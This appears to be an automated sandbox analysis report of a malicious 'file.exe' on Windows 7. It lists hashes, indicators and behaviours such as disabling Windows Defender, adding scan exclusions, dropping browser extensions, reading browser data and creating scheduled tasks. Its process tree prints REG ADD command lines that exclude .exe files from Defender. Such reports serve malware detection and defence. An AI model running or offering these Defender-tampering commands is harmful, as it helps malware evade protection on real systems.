Analysis
-
max time kernel
135s -
max time network
140s -
platform
windows7_x64 -
resource
win7-20220901-en -
resource tags
arch:x64arch:x86image:win7-20220901-enlocale:en-usos:windows7-x64system -
submitted
05-11-2022 09:28
Static task
static1
Behavioral task
behavioral1
Sample
file.exe
Resource
win7-20220901-en
General
-
Target
file.exe
-
Size
7.3MB
-
MD5
a08d3f67fde4006da781ac1e717ee958
-
SHA1
9f41963e82ed74d37f44a2c8fcad65a13ae700d2
-
SHA256
cc140cad392a3f07f0bc24c2d88a779db1515516af34667e0adbae7392fd141f
-
SHA512
e871000cda1def09580cd4364789cce5427e50ce0c2161582c7f782b312af119cfc7d2f0c21829d40b9948070d51ba521a300ffff03efcd19f84856c72826b6c
-
SSDEEP
196608:91OIu2jkGaigQmXmYPR4NAE/ISmVInXdoexahHTQ8noJOB:3OIuxQrmW7NPmANoC2oIB
Malware Config
Signatures
-
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" reg.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\THJtcQhgWvnU2 = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\alnSasXUPlGcllamlWR = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths conhost.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\ssaUiutRRYUn = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\JjXKhaNsdWYOC = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\pOuhVTeSU = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\zQkKlpNdciTvYFUB = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths Process not Found Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\alnSasXUPlGcllamlWR = "0" Process not Found Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\JjXKhaNsdWYOC = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\THJtcQhgWvnU2 = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\TZDtwbxgOiHNmJmUm = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\zQkKlpNdciTvYFUB = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\iaQnfTLRJLxsdTVB = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\TZDtwbxgOiHNmJmUm = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\zQkKlpNdciTvYFUB = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\ssaUiutRRYUn = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\iaQnfTLRJLxsdTVB = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\zQkKlpNdciTvYFUB = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\pOuhVTeSU = "0" conhost.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe -
Blocklisted process makes network request 1 IoCs
flow pid Process 21 2028 rundll32.exe -
Executes dropped EXE 4 IoCs
pid Process 1100 Install.exe 2024 Install.exe 1912 UVqXlMo.exe 1344 hKuDlSk.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Control Panel\International\Geo\Nation hKuDlSk.exe -
Loads dropped DLL 12 IoCs
pid Process 1200 file.exe 1100 Install.exe 1100 Install.exe 1100 Install.exe 1100 Install.exe 2024 Install.exe 2024 Install.exe 2024 Install.exe 2028 rundll32.exe 2028 rundll32.exe 2028 rundll32.exe 2028 rundll32.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\manifest.json hKuDlSk.exe -
Drops file in System32 directory 19 IoCs
description ioc Process File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol UVqXlMo.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol UVqXlMo.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat hKuDlSk.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA hKuDlSk.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA hKuDlSk.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_5C3F4CB4665DCF2109A8C91DBA78E447 hKuDlSk.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat rundll32.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA hKuDlSk.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F2DDCD2B5F37625B82E81F4976CEE400_3B0C6F9A5FE4CC35B9E0194525154B89 hKuDlSk.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F2DDCD2B5F37625B82E81F4976CEE400_3B0C6F9A5FE4CC35B9E0194525154B89 hKuDlSk.exe File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini UVqXlMo.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA hKuDlSk.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol hKuDlSk.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_5C3F4CB4665DCF2109A8C91DBA78E447 hKuDlSk.exe -
Drops file in Program Files directory 13 IoCs
description ioc Process File created C:\Program Files (x86)\alnSasXUPlGcllamlWR\hlwaLTo.dll hKuDlSk.exe File created C:\Program Files (x86)\alnSasXUPlGcllamlWR\gEUdftX.xml hKuDlSk.exe File created C:\Program Files (x86)\JjXKhaNsdWYOC\VpezzUc.dll hKuDlSk.exe File created C:\Program Files (x86)\JjXKhaNsdWYOC\lhTbUAF.xml hKuDlSk.exe File created C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi hKuDlSk.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja hKuDlSk.exe File created C:\Program Files (x86)\pOuhVTeSU\TCvzJeG.xml hKuDlSk.exe File created C:\Program Files (x86)\THJtcQhgWvnU2\RUpCUNK.xml hKuDlSk.exe File created C:\Program Files (x86)\ssaUiutRRYUn\YmaMsxZ.dll hKuDlSk.exe File created C:\Program Files (x86)\pOuhVTeSU\xGMiEb.dll hKuDlSk.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi hKuDlSk.exe File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak hKuDlSk.exe File created C:\Program Files (x86)\THJtcQhgWvnU2\dxIGrMziXEEbu.dll hKuDlSk.exe -
Drops file in Windows directory 4 IoCs
description ioc Process File created C:\Windows\Tasks\cnCceyBMwkDvrDDBZ.job schtasks.exe File created C:\Windows\Tasks\bkCaKdRAMkWPSejAIR.job schtasks.exe File created C:\Windows\Tasks\WfNBsQJtbgJIxpVus.job schtasks.exe File created C:\Windows\Tasks\POjviKGjNxHsMlV.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 13 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1564 schtasks.exe 1660 schtasks.exe 2040 schtasks.exe 2020 schtasks.exe 1108 schtasks.exe 1396 schtasks.exe 1336 schtasks.exe 1864 schtasks.exe 1904 schtasks.exe 1572 schtasks.exe 1844 schtasks.exe 1212 schtasks.exe 964 schtasks.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\6a-9b-22-b4-3b-a7\WpadDecisionReason = "1" rundll32.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" hKuDlSk.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs hKuDlSk.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople hKuDlSk.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\6a-9b-22-b4-3b-a7\WpadDecisionTime = 70274a36f9f0d801 hKuDlSk.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000003000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a7f0002000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 rundll32.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\6a-9b-22-b4-3b-a7\WpadDecisionTime = 70274a36f9f0d801 rundll32.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" hKuDlSk.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" hKuDlSk.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 hKuDlSk.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates hKuDlSk.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings hKuDlSk.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs hKuDlSk.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs hKuDlSk.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing wscript.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{5AC7D188-5E1B-45B5-8B9E-4E1BECD6D9A8}\6a-9b-22-b4-3b-a7 hKuDlSk.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs hKuDlSk.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust hKuDlSk.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates hKuDlSk.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs hKuDlSk.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs hKuDlSk.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA hKuDlSk.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root hKuDlSk.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs hKuDlSk.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople hKuDlSk.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs hKuDlSk.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings hKuDlSk.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{5AC7D188-5E1B-45B5-8B9E-4E1BECD6D9A8}\WpadDecisionTime = 70274a36f9f0d801 hKuDlSk.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\6a-9b-22-b4-3b-a7\WpadDecision = "0" hKuDlSk.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates hKuDlSk.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs hKuDlSk.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust hKuDlSk.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{5AC7D188-5E1B-45B5-8B9E-4E1BECD6D9A8}\6a-9b-22-b4-3b-a7 rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host\Settings wscript.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000003000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a7f0002000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 hKuDlSk.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{5AC7D188-5E1B-45B5-8B9E-4E1BECD6D9A8}\WpadNetworkName = "Network" hKuDlSk.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs hKuDlSk.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft wscript.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing hKuDlSk.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates hKuDlSk.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs hKuDlSk.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs hKuDlSk.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs hKuDlSk.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates hKuDlSk.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software wscript.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host wscript.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix hKuDlSk.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\6a-9b-22-b4-3b-a7\WpadDetectedUrl rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections hKuDlSk.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{5AC7D188-5E1B-45B5-8B9E-4E1BECD6D9A8}\WpadDecision = "0" hKuDlSk.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates hKuDlSk.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates hKuDlSk.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs hKuDlSk.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs hKuDlSk.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 hKuDlSk.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA hKuDlSk.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed hKuDlSk.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings rundll32.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad rundll32.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\6a-9b-22-b4-3b-a7\WpadDecision = "0" rundll32.exe -
Suspicious behavior: EnumeratesProcesses 28 IoCs
pid Process 964 powershell.EXE 964 powershell.EXE 964 powershell.EXE 1580 powershell.EXE 1580 powershell.EXE 1580 powershell.EXE 1620 powershell.EXE 1620 powershell.EXE 1620 powershell.EXE 1752 powershell.EXE 1752 powershell.EXE 1752 powershell.EXE 1344 hKuDlSk.exe 1344 hKuDlSk.exe 1344 hKuDlSk.exe 1344 hKuDlSk.exe 1344 hKuDlSk.exe 1344 hKuDlSk.exe 1344 hKuDlSk.exe 1344 hKuDlSk.exe 1344 hKuDlSk.exe 1344 hKuDlSk.exe 1344 hKuDlSk.exe 1344 hKuDlSk.exe 1344 hKuDlSk.exe 1344 hKuDlSk.exe 1344 hKuDlSk.exe 1344 hKuDlSk.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 964 powershell.EXE Token: SeDebugPrivilege 1580 powershell.EXE Token: SeDebugPrivilege 1620 powershell.EXE Token: SeDebugPrivilege 1752 powershell.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1200 wrote to memory of 1100 1200 file.exe 27 PID 1200 wrote to memory of 1100 1200 file.exe 27 PID 1200 wrote to memory of 1100 1200 file.exe 27 PID 1200 wrote to memory of 1100 1200 file.exe 27 PID 1200 wrote to memory of 1100 1200 file.exe 27 PID 1200 wrote to memory of 1100 1200 file.exe 27 PID 1200 wrote to memory of 1100 1200 file.exe 27 PID 1100 wrote to memory of 2024 1100 Install.exe 28 PID 1100 wrote to memory of 2024 1100 Install.exe 28 PID 1100 wrote to memory of 2024 1100 Install.exe 28 PID 1100 wrote to memory of 2024 1100 Install.exe 28 PID 1100 wrote to memory of 2024 1100 Install.exe 28 PID 1100 wrote to memory of 2024 1100 Install.exe 28 PID 1100 wrote to memory of 2024 1100 Install.exe 28 PID 2024 wrote to memory of 824 2024 Install.exe 30 PID 2024 wrote to memory of 824 2024 Install.exe 30 PID 2024 wrote to memory of 824 2024 Install.exe 30 PID 2024 wrote to memory of 824 2024 Install.exe 30 PID 2024 wrote to memory of 824 2024 Install.exe 30 PID 2024 wrote to memory of 824 2024 Install.exe 30 PID 2024 wrote to memory of 824 2024 Install.exe 30 PID 2024 wrote to memory of 1964 2024 Install.exe 32 PID 2024 wrote to memory of 1964 2024 Install.exe 32 PID 2024 wrote to memory of 1964 2024 Install.exe 32 PID 2024 wrote to memory of 1964 2024 Install.exe 32 PID 2024 wrote to memory of 1964 2024 Install.exe 32 PID 2024 wrote to memory of 1964 2024 Install.exe 32 PID 2024 wrote to memory of 1964 2024 Install.exe 32 PID 824 wrote to memory of 1876 824 forfiles.exe 34 PID 824 wrote to memory of 1876 824 forfiles.exe 34 PID 824 wrote to memory of 1876 824 forfiles.exe 34 PID 824 wrote to memory of 1876 824 forfiles.exe 34 PID 824 wrote to memory of 1876 824 forfiles.exe 34 PID 824 wrote to memory of 1876 824 forfiles.exe 34 PID 824 wrote to memory of 1876 824 forfiles.exe 34 PID 1964 wrote to memory of 1104 1964 forfiles.exe 35 PID 1964 wrote to memory of 1104 1964 forfiles.exe 35 PID 1964 wrote to memory of 1104 1964 forfiles.exe 35 PID 1964 wrote to memory of 1104 1964 forfiles.exe 35 PID 1964 wrote to memory of 1104 1964 forfiles.exe 35 PID 1964 wrote to memory of 1104 1964 forfiles.exe 35 PID 1964 wrote to memory of 1104 1964 forfiles.exe 35 PID 1876 wrote to memory of 988 1876 cmd.exe 36 PID 1876 wrote to memory of 988 1876 cmd.exe 36 PID 1876 wrote to memory of 988 1876 cmd.exe 36 PID 1876 wrote to memory of 988 1876 cmd.exe 36 PID 1876 wrote to memory of 988 1876 cmd.exe 36 PID 1876 wrote to memory of 988 1876 cmd.exe 36 PID 1876 wrote to memory of 988 1876 cmd.exe 36 PID 1104 wrote to memory of 1172 1104 cmd.exe 37 PID 1104 wrote to memory of 1172 1104 cmd.exe 37 PID 1104 wrote to memory of 1172 1104 cmd.exe 37 PID 1104 wrote to memory of 1172 1104 cmd.exe 37 PID 1104 wrote to memory of 1172 1104 cmd.exe 37 PID 1104 wrote to memory of 1172 1104 cmd.exe 37 PID 1104 wrote to memory of 1172 1104 cmd.exe 37 PID 1876 wrote to memory of 816 1876 cmd.exe 38 PID 1876 wrote to memory of 816 1876 cmd.exe 38 PID 1876 wrote to memory of 816 1876 cmd.exe 38 PID 1876 wrote to memory of 816 1876 cmd.exe 38 PID 1876 wrote to memory of 816 1876 cmd.exe 38 PID 1876 wrote to memory of 816 1876 cmd.exe 38 PID 1876 wrote to memory of 816 1876 cmd.exe 38 PID 1104 wrote to memory of 1188 1104 cmd.exe 39
Processes
-
C:\Users\Admin\AppData\Local\Temp\file.exe"C:\Users\Admin\AppData\Local\Temp\file.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1200 -
C:\Users\Admin\AppData\Local\Temp\7zS18FE.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1100 -
C:\Users\Admin\AppData\Local\Temp\7zS1F16.tmp\Install.exe.\Install.exe /S /site_id "525403"3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:2024 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:824 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&5⤵
